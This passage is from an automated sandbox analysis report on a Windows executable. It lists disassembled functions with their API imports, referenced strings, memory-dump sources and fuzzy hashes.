Function 00007FF716130548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7161305FC
SetLastError.KERNEL32 ref: 00007FF716130697

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
Instruction ID: c2ee052cad23a1d5f82b1e957a16accd76f93d53449f9549ae2c8a4adba28f86
Opcode Fuzzy Hash: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
Instruction Fuzzy Hash: 1951C472B14E4285FB00AB74EC452FEA362EB85BB8F804135DA1D5779AEF2CD548D360

Function 00007FF716139D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF716139DBC
GetLastError.KERNEL32 ref: 00007FF716139E08
CreateDirectoryW.KERNEL32 ref: 00007FF716139F10
LocalFree.KERNEL32 ref: 00007FF716139F20

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
Instruction ID: f51bba8f256e3da40b6eeb05d1bf8d01f2db3855b314aa2540ed268a5ba4c5b7
Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
Instruction Fuzzy Hash: A4515032618B4286F740AF21F8447AEB7B5FB85BA4F901035EA4E57A58EF3CD408DB10

Function 00007FF71614DB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614DBAF
WideCharToMultiByte.KERNEL32 ref: 00007FF71614DC81
GetLastError.KERNEL32 ref: 00007FF71614DCA4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614DCD6

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction ID: 464a0e039aef26c22ec724204195ea7bf20e76f018988176e2466ff77d03865f
Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction Fuzzy Hash: D3419573E08E4246FF61AA55B84037BE290AF41BB0FD48135DA4D47AD5EF6CD449A620

Function 00007FF716123980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF7161239BD
MoveFileW.KERNEL32 ref: 00007FF716123A34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716123AEB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716123AF1

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
Instruction ID: 26a166a0071f4e7c7f9c828cc152cf9c00b3eab100dfcb2efe87e4909dc25acf
Opcode Fuzzy Hash: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
Instruction Fuzzy Hash: B441E162F10B5184FF00EB79EC441AEA372BB45BB4B905235DE1D57AA9EF38C048D310

Function 00007FF716150B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF71614C45B), ref: 00007FF716150C57

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: 2741be648dbc0f75b2644c5689700c8c3ada98c8d0263f274d1880ddd3f8386c
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction Fuzzy Hash: EE21A431E18F5181F664AF15B84002AE6B4FB56BE1B894174DE8E63BA8DF3CD456D320

Function 00007FF71614D440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF716147F28,?,?,?,00007FF716149D35), ref: 00007FF71614D44A
SetLastError.KERNEL32(?,?,?,00007FF716147F28,?,?,?,00007FF716149D35), ref: 00007FF71614D4B2
SetLastError.KERNEL32(?,?,?,00007FF716147F28,?,?,?,00007FF716149D35), ref: 00007FF71614D4C8
abort.LIBCMT ref: 00007FF71614D4CE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction ID: e6ef1bb9b4a3d2f8e666e2145b718441fbc3c5c70e7fc183639dc95e49b8929c
Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
Instruction Fuzzy Hash: CC013935E09E4242FE587725BD5A13B91A15F447F0FD80438D91E43BD6FF2CB808A220

Function 00007FF716138590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF716138598
GetDeviceCaps.GDI32 ref: 00007FF7161385AE
GetDeviceCaps.GDI32 ref: 00007FF7161385C2
ReleaseDC.USER32 ref: 00007FF7161385D3

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: acf0c3322858b26dee80c6dfa22a488cc97abdb3eb72a1db394757ef9f69b602
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 4EE0ED60F09E0282FF087B717C59137A191AF4C762F984439C81F8A350DE3CA88D9720

Function 00007FF71611E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611E549

Strings

DXGIDebug.dll, xrefs: 00007FF71611E35A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: DXGIDebug.dll
API String ID: 3668304517-540382549
Opcode ID: 0987c429807df35fdd24896527435974459c4b9b81a0ebe1677a01cdcabc3dd8
Instruction ID: 8de3a492de40fdd271c263aee4ebd1b18f5067280d1b71b38ceb0e64d4d2f19f
Opcode Fuzzy Hash: 0987c429807df35fdd24896527435974459c4b9b81a0ebe1677a01cdcabc3dd8
Instruction Fuzzy Hash: E171CD72A14B8182EB14DB65F8403AEB3A5FB547A4F944235DFAC03B95DF78E065D300

Function 00007FF71614E1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614E237

Strings

gfff, xrefs: 00007FF71614E362
e+000, xrefs: 00007FF71614E2DF

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction ID: afbf172e2e0710a63a90eb56d844bb57bb71fde5dd7f5b04df8e1ae200946a30
Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
Instruction Fuzzy Hash: 4D512972B1CBC246F7259F35AC4076AAB91E741BA0F889231C69C87BD6DF2CD448D710

Function 00007FF716129408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7161295A8: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7161295E6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612959C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161295A2

Strings

SIZE, xrefs: 00007FF716129443

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: SIZE
API String ID: 449872665-3243624926
Opcode ID: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
Instruction ID: 259594d283a002a44b0e9f2b3e0a2684034c25f1070c9f781f81aaaba303ce47
Opcode Fuzzy Hash: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
Instruction Fuzzy Hash: E641A772A18A8285FA10EB29F8413BFA352EF857F1F904636E69D026D5EF3CD548D710

Function 00007FF71614C2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614C2EA
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF716142CD5), ref: 00007FF71614C30B

Strings

C:\Users\user\Desktop\bFZYRLnRIz.exe, xrefs: 00007FF71614C2F9

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\bFZYRLnRIz.exe
API String ID: 3307058713-58610444
Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction ID: 8e67e3463bd03e98c3c7a824bd26615620d266113df9c58e8de98b90467cc8b3
Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
Instruction Fuzzy Hash: 44417F72A08E5286FB15EF25BC401BAB7E5EB447E4B844031E94D47B45EF3DE449E360

Function 00007FF716139B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71611255C: GetDlgItem.USER32 ref: 00007FF7161125AC
Part of subcall function 00007FF71611255C: SetDlgItemTextW.USER32 ref: 00007FF7161125C8

EndDialog.USER32 ref: 00007FF716139C24
SetDlgItemTextW.USER32 ref: 00007FF716139CAA

Strings

ASKNEXTVOL, xrefs: 00007FF716139B72

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Item$Text$Dialog
String ID: ASKNEXTVOL
API String ID: 2638039312-3402441367
Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction ID: 60db427630cf82689fbdde6c2c8a988592f56ee86006e4c3a9287ceb6ffdfb15
Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
Instruction Fuzzy Hash: 0C418962A0CE4241FA10BB25FD501BBE7A1AF85BF0F944435DE4E077A5DE3CD449A360

Function 00007FF716129638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7161296EA

Part of subcall function 00007FF716130F68: WideCharToMultiByte.KERNEL32 ref: 00007FF716130F99

Strings

$%s, xrefs: 00007FF7161296D7
@%s, xrefs: 00007FF7161296CE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: 1b13279bf44ca8789f001dd1ff5b02bc570c1f9edd30f8b676c040e0b8518e49
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: 9F31B872B18E8686FA10AF6AF8406EAA3A2FB457E4F901036DE0D07755DF3CD509D750

Function 00007FF71614EB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF71614EB76
GetFileType.KERNEL32 ref: 00007FF71614EB8C

Strings

@, xrefs: 00007FF71614EBB7

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
